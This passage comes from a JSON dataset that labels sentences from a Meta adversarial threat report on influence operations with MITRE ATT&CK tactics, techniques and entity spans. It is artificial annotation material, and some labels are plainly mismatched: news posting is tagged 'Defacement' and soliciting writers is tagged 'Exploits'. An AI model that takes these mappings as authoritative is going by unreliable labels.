"procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p10-s70-ab4494", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 70, "context_before": "Second, we detected and took down an attempt to come back by a network we removed in December 2020 and linked to individuals associated with past activity by the Russian Internet Research Agency (IRA).", "sentence_text": "Their off-platform activity appears to have begun last year and centered around a website, posing as an NGO focused on civil rights in the West.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "used a website posing as NGO", "entities": [ { "text": "Their", "start": 0, "end": 5, "label": "ThreatActor" }, { "text": "a website", "start": 80, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "posing as an NGO focused on civil rights in the West", "start": 91, "end": 143, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p10-s71-b04b6b", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 71, "context_before": "Their off-platform activity appears to have begun last year and centered around a website, posing as an NGO focused on civil rights in the West.", "sentence_text": "They unsuccessfully attempted to create Facebook accounts in late 2021 and January 2022.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585.001", "name": "Social Media Accounts" } ], "procedure": "attempted to create facebook accounts", "entities": [ { "text": "They ", "start": 0, "end": 5, "label": "ThreatActor" }, { "text": " attempted to create Facebook accounts", "start": 19, "end": 57, "label": "Action" }, { "text": "Facebook accounts", "start": 40, "end": 57, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-82_mitre_report-p10-s72-4051c5", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 72, "context_before": "They unsuccessfully attempted to create Facebook accounts in late 2021 and January 2022.", "sentence_text": "Politically-aligned non-state actors We detected and took down an attempt to come back by the network we removed in December 2020 and linked to people in the Luhansk region of Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1136.002", "name": "Domain Account" }, { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "politically aligned non state actors attempted to comeback with a network previously removed", "entities": [ { "text": "Politically-aligned non-state actors", "start": 0, "end": 36, "label": "ThreatActor" }, { "text": "people in the Luhansk region of Ukraine", "start": 144, "end": 183, "label": "ThreatActor" }, { "text": "attempt to come back ", "start": 66, "end": 87, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p10-s73-eb37cb", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 73, "context_before": "Politically-aligned non-state actors We detected and took down an attempt to come back by the network we removed in December 2020 and linked to people in the Luhansk region of Ukraine.", "sentence_text": "In early March, the Ukraine-focused site appeared to have been taken over to direct its audience towards a Telegram channel showing photos of Russian casualties.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "took over Ukraine-focused site and directed visitors to a Telegram channel", "entities": [ { "text": "Ukraine-focused site", "start": 20, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "Telegram channel", "start": 107, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "taken over", "start": 63, "end": 73, "label": "Action" }, { "text": "direct its audience towards a Telegram channel", "start": 77, "end": 123, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p10-s74-7b3225", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 74, "context_before": "In early March, the Ukraine-focused site appeared to have been taken over to direct its audience towards a Telegram channel showing photos of Russian casualties.", "sentence_text": "We also removed a network in Russia for violating our Inauthentic Behavior policy against mass reporting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p10-s75-8a36b7", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 75, "context_before": "We also removed a network in Russia for violating our Inauthentic Behavior policy against mass reporting.", "sentence_text": "More details on this network can be found here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p10-s76-5e3573", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 76, "context_before": "More details on this network can be found here.", "sentence_text": "ADVERSARIAL THREAT REPORT 10", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p11-s77-aed986", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 11, "sentence_id": 77, "context_before": "ADVERSARIAL THREAT REPORT 10", "sentence_text": "Financially motivated actors As is typical for major world events and critical societal issues, we’re seeing scammers around the world turn to the war in Ukraine to amass an audience and monetize everyone’s attention to this humanitarian crisis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p11-s78-2f2e2a", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 11, "sentence_id": 78, "context_before": "Financially motivated actors As is typical for major world events and critical societal issues, we’re seeing scammers around the world turn to the war in Ukraine to amass an audience and monetize everyone’s attention to this humanitarian crisis.", "sentence_text": "We’ve seen spammers from around the world use inauthentic behavior tactics including streaming live-gaming videos and reposting popular content including other people’s videos from Ukraine as a way to pose as sharing live updates.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "used gaming streams and reposted others' videos to pose as sharing live updates", "entities": [ { "text": "spammers from around the world", "start": 11, "end": 41, "label": "ThreatActor" }, { "text": "use inauthentic behavior tactics", "start": 42, "end": 74, "label": "Action" }, { "text": "streaming live-gaming videos", "start": 85, "end": 113, "label": "Action" }, { "text": "reposting popular content", "start": 118, "end": 143, "label": "Action" }, { "text": "pose as sharing live updates.", "start": 201, "end": 230, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p11-s79-a5a130", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 11, "sentence_id": 79, "context_before": "We’ve seen spammers from around the world use inauthentic behavior tactics including streaming live-gaming videos and reposting popular content including other people’s videos from Ukraine as a way to pose as sharing live updates.", "sentence_text": "Some of the spammers switched names repeatedly to trick people into following them so they can try making money by either driving people to off-platform ad-filled websites or selling them merchandise.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Switched names repeatedly and tricked people into following them to make money by driving them to ad-fiiled websited or selling merchandise", "entities": [ { "text": "spammers", "start": 12, "end": 20, "label": "ThreatActor" }, { "text": "switched names ", "start": 21, "end": 36, "label": "Action" }, { "text": " trick people into following them", "start": 49, "end": 82, "label": "Action" }, { "text": "off-platform ad-filled websites", "start": 140, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "try making money", "start": 95, "end": 111, "label": "Action" }, { "text": "driving people to off-platform ad-filled websites", "start": 122, "end": 171, "label": "Action" }, { "text": "selling them merchandise", "start": 175, "end": 199, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p11-s80-14ba93", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 11, "sentence_id": 80, "context_before": "Some of the spammers switched names repeatedly to trick people into following them so they can try making money by either driving people to off-platform ad-filled websites or selling them merchandise.", "sentence_text": "We also took down multiple clusters of long-abandoned compromised accounts that suddenly shifted to being run from Russia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p11-s81-751859", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 11, "sentence_id": 81, "context_before": "We also took down multiple clusters of long-abandoned compromised accounts that suddenly shifted to being run from Russia.", "sentence_text": "Many of them shared identical pro-separatist videos and amplified accounts in their own clusters, likely as part of paid inauthentic engagement.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "coordinated sharing of pro-separatist videos and account amplification", "entities": [ { "text": " them", "start": 7, "end": 12, "label": "ThreatActor" }, { "text": "shared identical pro-separatist videos", "start": 13, "end": 51, "label": "Action" }, { "text": "amplified accounts in their own clusters", "start": 56, "end": 96, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p11-s82-b08c05", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 11, "sentence_id": 82, "context_before": "Many of them shared identical pro-separatist videos and amplified accounts in their own clusters, likely as part of paid inauthentic engagement.", "sentence_text": "Account security\nWe strongly encourage people in Ukraine and Russia to strengthen the security of their online accounts, including email and social media.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p11-s83-d3ca47", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 11, "sentence_id": 83, "context_before": "Account security\nWe strongly encourage people in Ukraine and Russia to strengthen the security of their online accounts, including email and social media.", "sentence_text": "● Enable two-factor authentication using a third-party authentication app like Google Authenticator or Duo.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p11-s84-0dafcc", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 11, "sentence_id": 84, "context_before": "● Enable two-factor authentication using a third-party authentication app like Google Authenticator or Duo.", "sentence_text": "● Do not reuse your password.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p11-s85-089194", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 11, "sentence_id": 85, "context_before": "● Do not reuse your password.", "sentence_text": "Passwords should be strong and unique for each of your accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p11-s86-cbeb4f", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 11, "sentence_id": 86, "context_before": "Passwords should be strong and unique for each of your accounts.", "sentence_text": "ADVERSARIAL THREAT REPORT 11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p12-s87-8e0ea9", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 12, "sentence_id": 87, "context_before": "ADVERSARIAL THREAT REPORT 11", "sentence_text": "Removing four networks for coordinated inauthentic behavior We view CIB as coordinated efforts to manipulate public debate for a strategic goal where fake accounts are central to the operation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p12-s88-e75a40", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 12, "sentence_id": 88, "context_before": "Removing four networks for coordinated inauthentic behavior We view CIB as coordinated efforts to manipulate public debate for a strategic goal where fake accounts are central to the operation.", "sentence_text": "In each case, people coordinate with one another and use fake accounts to mislead others about who they are and what they are doing.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "use coordinated fake accounts to mislead people about their identity and actions", "entities": [ { "text": "people ", "start": 14, "end": 21, "label": "ThreatActor" }, { "text": "mislead others ", "start": 74, "end": 89, "label": "Action" }, { "text": "coordinate with one another", "start": 21, "end": 48, "label": "Action" }, { "text": "fake accounts", "start": 57, "end": 70, "label": "MalwareTool" }, { "text": "use fake accounts", "start": 53, "end": 70, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p12-s89-48b281", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 12, "sentence_id": 89, "context_before": "In each case, people coordinate with one another and use fake accounts to mislead others about who they are and what they are doing.", "sentence_text": "Continuous CIB enforcement: We monitor for efforts to re-establish a presence on our platforms by networks we previously removed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p12-s90-df51e0", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 12, "sentence_id": 90, "context_before": "Continuous CIB enforcement: We monitor for efforts to re-establish a presence on our platforms by networks we previously removed.", "sentence_text": "Using both automated and manual detection, we continuously remove accounts and Pages connected to networks we took down in the past.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p12-s92-338598", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 12, "sentence_id": 92, "context_before": "Brazil", "sentence_text": "This network originated in Brazil and targeted domestic audiences in that country.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p12-s93-0e8a4c", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 12, "sentence_id": 93, "context_before": "This network originated in Brazil and targeted domestic audiences in that country.", "sentence_text": "This activity ran in what appears to be two phases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p12-s94-c60ca8", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 12, "sentence_id": 94, "context_before": "This activity ran in what appears to be two phases.", "sentence_text": "They abandoned this activity after a couple of months, having gained almost no engagement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p12-s95-5d1896", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 12, "sentence_id": 95, "context_before": "They abandoned this activity after a couple of months, having gained almost no engagement.", "sentence_text": "In 2021, they created Pages that posed as fictitious NGOs and activists focused on environmental issues in the Amazonas region of Brazil.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "created pages posing as fictitious NGOs and activists", "entities": [ { "text": " they", "start": 8, "end": 13, "label": "ThreatActor" }, { "text": "Pages", "start": 22, "end": 27, "label": "Infrastructure_Indicator" }, { "text": "created Pages", "start": 14, "end": 27, "label": "Action" }, { "text": "posed as fictitious NGOs", "start": 33, "end": 57, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p12-s96-9bae29", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 12, "sentence_id": 96, "context_before": "In 2021, they created Pages that posed as fictitious NGOs and activists focused on environmental issues in the Amazonas region of Brazil.", "sentence_text": "ADVERSARIAL THREAT REPORT 12", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p13-s97-d1faf4", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 97, "context_before": "ADVERSARIAL THREAT REPORT 12", "sentence_text": "We found this network as a result of our investigation into suspected coordinated inauthentic behavior in the region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p13-s98-a1a929", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 98, "context_before": "We found this network as a result of our investigation into suspected coordinated inauthentic behavior in the region.", "sentence_text": "Although the people behind it attempted to conceal their identities and coordination, our investigation found links to individuals associated with the Brazilian Military1.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Attempted to conceal identities and coordination", "entities": [ { "text": " people behind it", "start": 12, "end": 29, "label": "ThreatActor" }, { "text": "individuals associated with the Brazilian Military1", "start": 119, "end": 170, "label": "ThreatActor" }, { "text": "conceal their identities and coordination", "start": 43, "end": 84, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p13-s99-09f496", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 99, "context_before": "Although the people behind it attempted to conceal their identities and coordination, our investigation found links to individuals associated with the Brazilian Military1.", "sentence_text": "● Advertising: Around $34 in spending for ads on Facebook and Instagram, paid for in Brazilian real.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p13-s100-ce82bd", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 100, "context_before": "● Advertising: Around $34 in spending for ads on Facebook and Instagram, paid for in Brazilian real.", "sentence_text": "This network originated in Costa Rica and El Salvador and targeted primarily Costa Rica and El Salvador.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p13-s101-f3007e", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 101, "context_before": "This network originated in Costa Rica and El Salvador and targeted primarily Costa Rica and El Salvador.", "sentence_text": "This network also amplified content from the Pages of local politicians and businesses.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Amplified content from the pages of local politicians and businesses", "entities": [ { "text": "This network", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "Pages ", "start": 45, "end": 51, "label": "Infrastructure_Indicator" }, { "text": " amplified content from the Pages of local politicians and businesses", "start": 17, "end": 86, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p13-s102-b76dda", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 102, "context_before": "This network also amplified content from the Pages of local politicians and businesses.", "sentence_text": "They would typically post on both sides of the political spectrum, including in support of competing political candidates running against each other.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "posted on both sides of the political spectrum, including in support of competing political candidates", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "post on both sides of the political spectrum", "start": 21, "end": 65, "label": "Action" }, { "text": "support of competing political candidates running against each other", "start": 80, "end": 148, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p13-s103-d353eb", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 103, "context_before": "They would typically post on both sides of the political spectrum, including in support of competing political candidates running against each other.", "sentence_text": "Some of these accounts had profile pictures likely generated using artificial intelligence techniques like generative adversarial networks (GAN).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "used AI-generated profile pictures for fake accounts", "entities": [ { "text": "generative adversarial networks (GAN)", "start": 107, "end": 144, "label": "MalwareTool" }, { "text": "artificial intelligence techniques", "start": 67, "end": 101, "label": "MalwareTool" } ] }, { "uid": "mitre-82_mitre_report-p13-s104-b0abf8", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 104, "context_before": "Some of these accounts had profile pictures likely generated using artificial intelligence techniques like generative adversarial networks (GAN).", "sentence_text": "The process of attributing violating activity to particular threat actors has been long debated by the security community.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p13-s105-be6a1e", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 105, "context_before": "The process of attributing violating activity to particular threat actors has been long debated by the security community.", "sentence_text": "Meta’s approach to attribution relies on the available technical and investigative signals at our disposal.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p13-s106-64ef6d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 106, "context_before": "Meta’s approach to attribution relies on the available technical and investigative signals at our disposal.", "sentence_text": "When, based on the available evidence, our expert investigative teams do not see clear evidence of command and control, but do see a number of individuals associated with the entity behind the operation, Meta will attribute the activity to “individuals linked to the entity.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p13-s107-8a8eb8", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 13, "sentence_id": 107, "context_before": "When, based on the available evidence, our expert investigative teams do not see clear evidence of command and control, but do see a number of individuals associated with the entity behind the operation, Meta will attribute the activity to “individuals linked to the entity.”", "sentence_text": "ADVERSARIAL THREAT REPORT 13", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p14-s108-ba3fb4", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 14, "sentence_id": 108, "context_before": "ADVERSARIAL THREAT REPORT 13", "sentence_text": "The individuals behind this operation posted primarily in Spanish about news and current events in Central America.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491", "name": "Defacement" } ], "procedure": "posted Spanish language content about central American current events", "entities": [ { "text": " individuals behind this operation", "start": 3, "end": 37, "label": "ThreatActor" }, { "text": " posted primarily in Spanish about news and current events in Central America.", "start": 37, "end": 115, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p14-s109-63a7eb", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 14, "sentence_id": 109, "context_before": "The individuals behind this operation posted primarily in Spanish about news and current events in Central America.", "sentence_text": "They also posted supportive commentary about one telecom company in Costa Rica and criticism of its competitors.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491", "name": "Defacement" } ], "procedure": "posted supportive and critical commentary about telecom companies", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "posted supportive commentary", "start": 10, "end": 38, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p14-s110-706c84", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 14, "sentence_id": 110, "context_before": "They also posted supportive commentary about one telecom company in Costa Rica and criticism of its competitors.", "sentence_text": "We found this network after reviewing public reporting about an off-platform portion of this activity and took action ahead of the election in Costa Rica.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p14-s111-1a3abc", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 14, "sentence_id": 111, "context_before": "We found this network after reviewing public reporting about an off-platform portion of this activity and took action ahead of the election in Costa Rica.", "sentence_text": "Noelix is now banned from our platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p14-s112-916801", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 14, "sentence_id": 112, "context_before": "Noelix is now banned from our platform.", "sentence_text": "● Advertising: Around $128,000 in spending for ads on Facebook and Instagram paid for primarily in US dollars and Costa Rican colón.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p14-s113-0af0f4", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 14, "sentence_id": 113, "context_before": "● Advertising: Around $128,000 in spending for ads on Facebook and Instagram paid for primarily in US dollars and Costa Rican colón.", "sentence_text": "3. Russia and Ukraine WereportedthisenforcementaspartofoursecurityupdateonFebruary27,2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p14-s114-aa2df2", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 14, "sentence_id": 114, "context_before": "3. Russia and Ukraine WereportedthisenforcementaspartofoursecurityupdateonFebruary27,2022.", "sentence_text": "This network operated from Russia and Ukraine and targeted primarily Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.006", "name": "Web Services" } ], "procedure": "network targeted Ukraine from Russia and Ukraine", "entities": [ { "text": "operated from Russia and Ukraine", "start": 13, "end": 45, "label": "Action" }, { "text": "targeted primarily Ukraine", "start": 50, "end": 76, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p14-s115-d40a60", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 14, "sentence_id": 115, "context_before": "This network operated from Russia and Ukraine and targeted primarily Ukraine.", "sentence_text": "These fictitious personas used profile pictures likely generated using artificial intelligence techniques like generative adversarial networks (GAN).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "used AI-generated profile pictures created with GANs", "entities": [ { "text": "generative adversarial networks (GAN)", "start": 111, "end": 148, "label": "MalwareTool" }, { "text": "artificial intelligence techniques", "start": 71, "end": 105, "label": "MalwareTool" }, { "text": "fictitious personas ", "start": 6, "end": 26, "label": "Infrastructure_Indicator" }, { "text": "used profile pictures likely generated using artificial intelligence", "start": 26, "end": 94, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p14-s116-d4c800", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 14, "sentence_id": 116, "context_before": "These fictitious personas used profile pictures likely generated using artificial intelligence techniques like generative adversarial networks (GAN).", "sentence_text": "ADVERSARIAL THREAT REPORT 14", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p15-s117-27d024", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 15, "sentence_id": 117, "context_before": "ADVERSARIAL THREAT REPORT 14", "sentence_text": "This operation ran a handful of websites masquerading as independent news outlets, publishing claims about the West betraying Ukraine and Ukraine being a failed state.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "ran fake news websites to publish disinformation", "entities": [ { "text": "This operation", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "websites masquerading as independent news", "start": 32, "end": 73, "label": "Infrastructure_Indicator" }, { "text": " ran a handful of websites", "start": 14, "end": 40, "label": "Action" }, { "text": "publishing claims about the West", "start": 83, "end": 115, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p15-s118-57d998", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 15, "sentence_id": 118, "context_before": "This operation ran a handful of websites masquerading as independent news outlets, publishing claims about the West betraying Ukraine and Ukraine being a failed state.", "sentence_text": "● Advertising: Around $200 in spending for ads on Facebook and Instagram paid for primarily in Russian ruble and US dollars.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.006", "name": "Web Services" } ], "procedure": "spent around $200 for ads on Facebook and Instagram. paid for primarily in Russian ruble and US dollars", "entities": [ { "text": "ads on Facebook and Instagram", "start": 43, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "spending", "start": 30, "end": 38, "label": "Action" }, { "text": "paid for primarily in Russian ruble and US dollars", "start": 73, "end": 123, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p15-s119-093008", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 15, "sentence_id": 119, "context_before": "● Advertising: Around $200 in spending for ads on Facebook and Instagram paid for primarily in Russian ruble and US dollars.", "sentence_text": "4. Russia\nWereportedthisenforcementaspartofourCIBupdateonFebruary16,2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p15-s120-4ac8a6", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 15, "sentence_id": 120, "context_before": "4. Russia\nWereportedthisenforcementaspartofourCIBupdateonFebruary16,2022.", "sentence_text": "We removed a small network of three Facebook accounts for violating our policy against coordinated inauthentic behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p15-s121-851caa", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 15, "sentence_id": 121, "context_before": "We removed a small network of three Facebook accounts for violating our policy against coordinated inauthentic behavior.", "sentence_text": "The people behind this activity used fake accounts to create fictitious personas, posing as a media editor or as a Europe-based Arab-speaking executive at a PR agency.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "used fake accounts to create fictitious personas and pose as professionals", "entities": [ { "text": "people behind this activity", "start": 4, "end": 31, "label": "ThreatActor" }, { "text": "fake accounts", "start": 37, "end": 50, "label": "MalwareTool" }, { "text": "fictitious personas", "start": 61, "end": 80, "label": "MalwareTool" }, { "text": "used fake accounts to create fictitious personas", "start": 32, "end": 80, "label": "Action" }, { "text": "posing as a media editor or as a Europe-based Arab-speaking executive at a PR agency", "start": 82, "end": 166, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p15-s122-900330", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 15, "sentence_id": 122, "context_before": "The people behind this activity used fake accounts to create fictitious personas, posing as a media editor or as a Europe-based Arab-speaking executive at a PR agency.", "sentence_text": "These accounts had profile pictures, likely generated using artificial intelligence techniques like generative adversarial networks (GAN).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "generated profile pictures using artificial intelligence techniques like GAN", "entities": [ { "text": "generative adversarial networks (GAN)", "start": 100, "end": 137, "label": "MalwareTool" }, { "text": "artificial intelligence techniques", "start": 60, "end": 94, "label": "MalwareTool" }, { "text": "These accounts", "start": 0, "end": 14, "label": "Infrastructure_Indicator" }, { "text": " generated using artificial intelligence techniques", "start": 43, "end": 94, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p15-s123-2c2ac5", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 15, "sentence_id": 123, "context_before": "These accounts had profile pictures, likely generated using artificial intelligence techniques like generative adversarial networks (GAN).", "sentence_text": "We saw two short periods of activity — both largely unsuccessful.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p15-s124-523beb", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 15, "sentence_id": 124, "context_before": "We saw two short periods of activity — both largely unsuccessful.", "sentence_text": "First, this operation tried to solicit freelance help to write articles about Syria through the Arabic-language journalist Groups.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.005", "name": "Exploits" } ], "procedure": "tried to solicit freelance help to write articles about syria through Arabic-language journalist group", "entities": [ { "text": "this operation", "start": 7, 